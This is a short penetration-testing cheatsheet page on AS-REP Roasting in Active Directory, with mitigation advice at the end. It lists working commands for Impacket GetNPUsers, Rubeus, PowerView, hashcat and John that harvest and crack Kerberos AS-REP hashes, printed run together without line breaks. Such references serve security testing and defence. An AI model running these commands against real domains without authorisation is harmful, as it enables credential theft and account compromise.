Asrep Roasting
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
AS-REP Roasting exploits users without Kerberos pre-authentication enabled. When pre-authentication is disabled, an attacker can request an AS-REP ticket for any user and receive encrypted data that can be cracked offline.
This attack targets the Kerberos authentication protocol and is effective against accounts with the UF_DONT_REQUIRE_PREAUTH flag set.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Asrep Roasting:
impacket-GetNPUsers -dc-ip 10.10.10.10 domain.local/ -format hashcat -usersfile users.txtRubeus.exe asreproast /format:hashcat /outfile:hashes.txtGet-NetUser -PreauthNotRequired | select name,samaccountnamehashcat -m 18200 hashes.txt wordlist.txtjohn --format=krb5asrep hashes.txt --wordlist=wordlist.txtTools & Techniques
Recommended tools for Asrep Roasting:
- Impacket GetNPUsers: gather AS-REP hashes from domain
- Rubeus: .NET tool for Kerberos interaction
- PowerView: identify users without pre-authentication
- Hashcat (mode 18200) or John for offline cracking
Prevention & Mitigation
Security recommendations to prevent Asrep Roasting:
- Enable Kerberos pre-authentication for all user accounts
- Identify and audit accounts with UF_DONT_REQUIRE_PREAUTH set
- Use strong, complex passwords for all service accounts
- Monitor for AS-REP request anomalies in security logs (Event ID 4768)
References
Additional resources: